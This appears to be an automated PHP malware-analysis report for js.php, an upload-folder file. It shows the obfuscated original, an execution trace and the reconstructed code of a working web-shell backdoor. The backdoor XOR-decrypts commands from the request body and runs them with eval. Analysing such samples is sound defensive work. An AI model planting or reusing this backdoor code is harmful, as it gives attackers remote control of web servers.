js.php

md5: 878db2a64c2706404f996b68c1ad62c3

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Encoding
base64_decode (Traces)
base64_encode (Traces)

Execution
eval (Traces)

Files
file_get_contents (Traces)

Input
php:\/\/input (Original, Traces)

Deobfuscated PHP code
Failed to deobfuscate code
Execution traces
data/traces/878db2a64c2706404f996b68c1ad62c3_trace-1676239213.4373.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:00:39.335154]
1	0	1	0.000138	393464
1	3	0	0.000195	396392	{main}	1		/var/www/html/uploads/js.php	0	0
1		A						/var/www/html/uploads/js.php	2	$m = '($iI=0;$iII<$l;){for(I$j=0I;($j<$cI&&$i<$l)I;$j++,$i++I){$oI.=$t{I$Ii}I^$k'
1		A						/var/www/html/uploads/js.php	3	$o = 'Iqja2d1";IfunctIionI Ix($t,$k){$Ic=stIrleIn($kI);$l=stIrlen($t);$o="";fIor'
1		A						/var/www/html/uploads/js.php	4	$A = '{$j};}}retIuIrn $o;}if (I@pregI_match(I"/$kh(.+)$kIf/",@fIIile_Iget_IcontI'
1		A						/var/www/html/uploads/js.php	5	$T = ';$rI=@basIeI64_eIncode(@x(@gzcIompress(I$o),$Ik))I;print("$IpI$kh$r$kf");}'
1		A						/var/www/html/uploads/js.php	6	$f = 'ents("php://input"I),$m)==I1) {@oIIIb_start();@eIval(@gzuIncompreIsIs(@x(@'
2	4	0	0.000286	396392	str_replace	0		/var/www/html/uploads/js.php	7	3	'Kw'	''	'cKwreaKwKwte_fKwKwunKwction'
2	4	1	0.000303	396528
2	4	R			'create_function'
1		A						/var/www/html/uploads/js.php	7	$X = 'create_function'
1		A						/var/www/html/uploads/js.php	8	$U = 'bIase6I4_decode($m[1])I,I$k)));$o=@oIbI_geIt_contents();I@ob_enId_cIlean()'
1		A						/var/www/html/uploads/js.php	9	$r = '$k="Iebcfc18d";I$kh="38Ia772eIdd52eI";$Ikf="98Iad8I50c2ee7";$p="kIQGBvflIdVL'
2	5	0	0.000356	397072	str_replace	0		/var/www/html/uploads/js.php	10	3	'I'	''	'$k="Iebcfc18d";I$kh="38Ia772eIdd52eI";$Ikf="98Iad8I50c2ee7";$p="kIQGBvflIdVLIqja2d1";IfunctIionI Ix($t,$k){$Ic=stIrleIn($kI);$l=stIrlen($t);$o="";fIor($iI=0;$iII<$l;){for(I$j=0I;($j<$cI&&$i<$l)I;$j++,$i++I){$oI.=$t{I$Ii}I^$k{$j};}}retIuIrn $o;}if (I@pregI_match(I"/$kh(.+)$kIf/",@fIIile_Iget_IcontIents("php://input"I),$m)==I1) {@oIIIb_start();@eIval(@gzuIncompreIsIs(@x(@bIase6I4_decode($m[1])I,I$k)));$o=@oIbI_geIt_contents();I@ob_enId_cIlean();$rI=@basIeI64_eIncode(@x(@gzcIompress(I$o),$Ik))I;print("$IpI$kh$'
2	5	1	0.000388	397680
2	5	R			'$k="ebcfc18d";$kh="38a772edd52e";$kf="98ad850c2ee7";$p="kQGBvfldVLqja2d1";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
1		A						/var/www/html/uploads/js.php	10	$E = '$k="ebcfc18d";$kh="38a772edd52e";$kf="98ad850c2ee7";$p="kQGBvfldVLqja2d1";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
2	6	0	0.000445	396944	create_function	0		/var/www/html/uploads/js.php	11	2	''	'$k="ebcfc18d";$kh="38a772edd52e";$kf="98ad850c2ee7";$p="kQGBvfldVLqja2d1";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
3	7	0	0.000524	404984	{internal eval}	1		/var/www/html/uploads/js.php	11	0
3	7	1	0.000538	404984
3	7	R			NULL
2	6	1	0.000553	403616
2	6	R			'\000lambda_2'
1		A						/var/www/html/uploads/js.php	11	$d = '\000lambda_2'
2	8	0	0.000580	403552	__lambda_func	1		/var/www/html/uploads/js.php	11	0
2		A						/var/www/html/uploads/js.php(11) : runtime-created function	1	$k = 'ebcfc18d'
2		A						/var/www/html/uploads/js.php(11) : runtime-created function	1	$kh = '38a772edd52e'
2		A						/var/www/html/uploads/js.php(11) : runtime-created function	1	$kf = '98ad850c2ee7'
2		A						/var/www/html/uploads/js.php(11) : runtime-created function	1	$p = 'kQGBvfldVLqja2d1'
3	9	0	0.000638	403608	file_get_contents	0		/var/www/html/uploads/js.php(11) : runtime-created function	1	1	'php://input'
3	9	1	0.000658	404344
3	9	R			''
3	10	0	0.000671	404328	preg_match	0		/var/www/html/uploads/js.php(11) : runtime-created function	1	3	'/38a772edd52e(.+)98ad850c2ee7/'	''	NULL
3	10	1	0.000723	404488
3	10	R			0
2	8	1	0.000757	404248
1	3	1	0.000766	404248
			0.000791	321664
TRACE END   [2023-02-12 20:00:39.335834]

Generated HTML code
<html><head></head><body></body></html>
Original PHP code
<?php
$m='($iI=0;$iII<$l;){for(I$j=0I;($j<$cI&&$i<$l)I;$j++,$i++I){$oI.=$t{I$Ii}I^$k';
$o='Iqja2d1";IfunctIionI Ix($t,$k){$Ic=stIrleIn($kI);$l=stIrlen($t);$o="";fIor';
$A='{$j};}}retIuIrn $o;}if (I@pregI_match(I"/$kh(.+)$kIf/",@fIIile_Iget_IcontI';
$T=';$rI=@basIeI64_eIncode(@x(@gzcIompress(I$o),$Ik))I;print("$IpI$kh$r$kf");}';
$f='ents("php://input"I),$m)==I1) {@oIIIb_start();@eIval(@gzuIncompreIsIs(@x(@';
$X=str_replace('Kw','','cKwreaKwKwte_fKwKwunKwction');
$U='bIase6I4_decode($m[1])I,I$k)));$o=@oIbI_geIt_contents();I@ob_enId_cIlean()';
$r='$k="Iebcfc18d";I$kh="38Ia772eIdd52eI";$Ikf="98Iad8I50c2ee7";$p="kIQGBvflIdVL';
$E=str_replace('I','',$r.$o.$m.$A.$f.$U.$T);
$d=$X('',$E);$d();
?>
PHP Malware Analysis

js.php

md5: 878db2a64c2706404f996b68c1ad62c3

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
